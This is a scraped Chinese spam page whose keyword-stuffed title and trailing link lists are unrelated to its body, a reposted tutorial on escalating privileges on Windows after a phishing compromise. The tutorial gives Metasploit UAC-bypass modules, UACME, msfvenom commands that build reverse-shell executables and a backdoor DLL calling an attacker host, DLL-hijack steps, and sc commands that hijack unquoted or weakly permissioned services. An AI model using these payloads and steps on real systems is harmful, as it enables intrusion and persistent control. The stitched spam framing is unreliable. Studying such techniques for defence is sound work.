当前位置: 首页 > wzjs >正文

汕头网站搜索引擎优化天元建设集团有限公司工程

汕头网站搜索引擎优化,天元建设集团有限公司工程,网络规划设计师多少分,中英繁网站源码应用场景: 1、常规某个机器被钓鱼后门攻击后,我们需要做更高权限操作或权限维持等。 2、内网域中某个机器被钓鱼后门攻击后,我们需要对后续内网域做安全测试。 #Win10&11-BypassUAC自动提权-MSF&UACME 为了远程执行目标的exe或者b…

应用场景:

1常规某个机器被钓鱼后门攻击后,我们需要做更高权限操作或权限维持等。

2内网域中某个机器被钓鱼后门攻击后,我们需要对后续内网域做安全测试。

#Win10&11-BypassUAC自动提权-MSF&UACME

为了远程执行目标的exe或者bat可执行文件需要绕过此安全机制

在用户到系统权限自动提权中也学通过BypassUAC实现自动化提权

绕过项目:MSF内置,Powershell渗透框架,UACME项目(推荐)

开启UAC和未开启UAC时,CS/MSF默认getsystem提权影响(进程注入等)

msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx  lport=xx -f exe -o msf.exe

1、MSF模块:

use exploit/windows/local/ask

use exploit/windows/local/bypassua

use exploit/windows/local/bypassuac_sluihijack

use exploit/windows/local/bypassuac_silentcleanup

2、UACME项目:

https://github.com/hfiref0x/UACME

Akagi64.exe 编号 调用执行

#Windows-DLL劫持提权应用配合MSF-FlashFXP

原理:Windows程序启动的时候需要DLL。如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常,Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索:

1、应用程序加载的目录

2、C:\Windows\System32

3、C:\Windows\System

4、C:\Windows

5、当前工作目录Current Working Directory,CWD

6、在PATH环境变量的目录(先系统后用户)

过程:信息收集-进程调试-制作dll并上传-替换dll-等待启动应用成功

检测:ChkDllHijack 火绒剑

项目:https://github.com/anhkgg/anhkgg-tools

利用火绒剑进行进程分析加载DLL,一般寻程序DLL利用。

生成dll后门:

msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx  lport=xx -f dll -o xiaodi.dll

提前信息收集相关软件及DLL问题程序,本地调试成功后覆盖DLL实现利用

#Windows-不带引号服务路径配合MSF-MacroExpert

原理:服务路径配置由于目录空格问题,可上传文件配合解析恶意触发执行

过程:检测服务权限配置-制作文件并上传-服务路径指向解析-等待调用成功

检测命令:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

上传反弹exe,设置好对应执行名后,执行sc start "Macro Expert"

#Win2012-不安全的服务权限配合MSF-NewServices

原理:即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务拥有过多的权限,例如,可以直接修改它导致重定向执行文件。

过程:检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功

检测脚本:accesschk.exe -uwcqv "" *

https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk

sc config "test" binpath= "C:\Program.exe"

sc start test

#综合类检测项目:

https://github.com/carlospolop/PEASS-ng

PEAS-ng适用于Windows和Linux/Unix*和MacOS的权限提升工具。

winPEAS.bat > result.txt

winPEASany.exe log=result.txt


文章转载自:

http://t8w3eAqK.dysgr.cn
http://EbB0anJb.dysgr.cn
http://6XtI4uxi.dysgr.cn
http://GkUHBSLF.dysgr.cn
http://CRUsLKAU.dysgr.cn
http://jzL7lofo.dysgr.cn
http://OWHeyWK5.dysgr.cn
http://pQPAOp2X.dysgr.cn
http://uaVZ1L4N.dysgr.cn
http://Vd4dssRi.dysgr.cn
http://Zyx6R38e.dysgr.cn
http://Y7MYhG7B.dysgr.cn
http://LQLWJURb.dysgr.cn
http://g3u1aqkT.dysgr.cn
http://oTwAG0pD.dysgr.cn
http://eslkBglf.dysgr.cn
http://ZiBDfRGp.dysgr.cn
http://H7APPaiI.dysgr.cn
http://QPsYPkUM.dysgr.cn
http://f6PjwOY8.dysgr.cn
http://KSZhv6Tg.dysgr.cn
http://iJtYC6GB.dysgr.cn
http://kaJBfLZi.dysgr.cn
http://EjqwH63N.dysgr.cn
http://h1toDwQW.dysgr.cn
http://0kSqYdnn.dysgr.cn
http://aYbuVPtS.dysgr.cn
http://75L7olID.dysgr.cn
http://KH3lqpZl.dysgr.cn
http://tuKiMCAy.dysgr.cn
http://www.dtcms.com/wzjs/715807.html

相关文章:

  • 海洋生态文明建设的网站名wordpress宠物模板
  • 微信开发网站建设程序网站建设法语
  • 网站发展趋势和前景wordpress下载类主题系统主题
  • 制作网页网站的软件做网站的公司图
  • 广州网站设计权威乐云践新扩展名 网站
  • 网站的小图标怎么做的免费制作logo的网站
  • 企业做网站好吗用手机做空间建网站
  • 石家庄网站关键词网页版微博
  • python 微信网站开发嘉兴app开发
  • 乐清网站制作公司招聘投诉百度最有效的电话
  • 自适应网站开发工具公司黄页网
  • 有免费的微网站制作吗江苏建设省直报名网站
  • 个人微企业网站模板湖北省建设厅网站资质
  • 如何做一间公司的网站网站建设企业开发
  • 小说网站建设教程软件项目开发流程和步骤
  • asp免费网站模板扬州天达建设集团有限公司网站
  • 网站建设和备案深圳市工程建设网站
  • 财务网站建设网页制作与设计课本
  • 网站建设需要包含什么百度一下首页
  • 二手闲置平台网站怎么做百度推广产品
  • 郑州做营销型网站的公司网站建设全国排行
  • 摄影网站开发背景重庆做网站建设团队
  • django 做网站四川省送变电建设有限责任公司网站
  • 如何做网站结构及栏目策划江西住房和城乡建设网站
  • 做电影网站多少钱设计网站客户体验
  • js素材网站wordpress 竞价页
  • 网络公司网站asp做网站英文编辑有前途吗
  • 餐饮网站建设思路建设一个网站的目标与期望
  • 建设网站要什么手续腾讯 wordpress
  • 做网站定制开发的公司企业培训的目的和意义